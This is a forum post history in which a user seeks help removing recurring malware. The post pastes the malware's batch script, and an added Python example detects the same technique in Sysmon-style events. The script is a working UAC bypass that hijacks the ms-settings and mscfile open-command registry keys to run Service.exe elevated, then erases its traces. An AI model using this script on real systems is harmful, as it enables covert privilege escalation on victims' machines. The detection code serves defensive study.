maltastic

Everything posted by maltastic

  1. Awesome, I will try this once I get home from work this morning. It will be a few hours, as I am on nights right now.
  2. So I scanned with Malwarebytes and not even 15 mins later this happens: a random extractor opens and Malwarebytes is removed, meaning it has bypassed Malwarebytes? Idk, some help would be great. https://imgur.com/a/9fpbTNI

     Here is the code of the malware in the .bat [ this and a .vbs + the service.exe keep appearing ]

         @echo off
         set PAYLOAD=C:\Users\Public\Documents\Service.exe
         net session >nul 2>&1 || goto :label
         %PAYLOAD%
         exit /b 2

         :label
         whoami /groups|findstr /i "\<S-1-5-32-544\>" >nul 2>&1
         if ERRORLEVEL 1 exit /b 1
         for /f "tokens=4-5 delims=. " %%i in ('ver') do set WIN_VER=%%i.%%j
         set key="HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System"
         for /f "skip=2 tokens=3" %%U in ('REG QUERY %key% /v ConsentPromptBehaviorAdmin') do set /a "UAC=%%U"
         if %UAC% equ 2 exit /b 1
         if %UAC% equ 5 (
             for %%V in (6.1 6.2 6.3) do if "%WIN_VER%" == "%%V" call :exploit mscfile CompMgmtLauncher.exe %PAYLOAD%
             if "%WIN_VER%" == "10.0" call :exploit ms-settings ComputerDefaults.exe %PAYLOAD%
         )>nul 2>&1
         if %UAC% equ 0 powershell -c Start-Process "%PAYLOAD%" -Verb runas
         exit /b 0

         :exploit <key> <trigger> <payload>
         set regPath="HKCU\Software\Classes\%1\shell\open\command"
         reg add %regPath% /d "%~3" /f
         reg add %regPath% /v DelegateExecute /f
         %~2
         reg delete "HKCU\Software\Classes\%1" /f
         exit /b

     I tried to use my own code to remove it but it keeps appearing ;P
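
Added example, not part of the original post: the posted script deletes the `HKCU\Software\Classes\%1` key right after running the trigger binary, so a later registry check finds nothing; this Python example instead flags the registry write and the resulting child process in event records. The dict layout using Sysmon field names (EventID 13 for a registry value set, EventID 1 for process creation), the function names and the sample events are assumptions constructed for illustration.

```python
import re

# Assumption: events are dicts using Sysmon field names (EventID 13 = registry
# value set, EventID 1 = process creation). All sample data is constructed.
HIJACK_KEY = re.compile(
    r"(?:\\Software\\Classes|_Classes)\\(mscfile|ms-settings)\\shell\\open\\command(?:\\|$)",
    re.IGNORECASE,
)
TRIGGERS = {"compmgmtlauncher.exe", "computerdefaults.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_hijack(events):
    """Return findings for the per-user handler hijack used by the posted .bat."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 13:
            m = HIJACK_KEY.search(ev.get("TargetObject", ""))
            if m:  # write under the mscfile / ms-settings open command
                findings.append(("registry", m.group(1).lower(), ev.get("Details", "")))
        elif ev.get("EventID") == 1:
            parent = basename(ev.get("ParentImage", ""))
            if parent in TRIGGERS:  # auto-elevating trigger spawned a child
                findings.append(("child-process", parent, ev.get("Image", "")))
    return findings


SAMPLE_EVENTS = [  # constructed; the SID is a placeholder
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001_Classes\ms-settings\shell\open\command\(Default)",
     "Details": r"C:\Users\Public\Documents\Service.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001_Classes\ms-settings\shell\open\command\DelegateExecute",
     "Details": "(Empty)"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\ComputerDefaults.exe",
     "Image": r"C:\Users\Public\Documents\Service.exe"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": "onedrive.exe"},
]

if __name__ == "__main__":
    for finding in find_hijack(SAMPLE_EVENTS):
        print(finding)
```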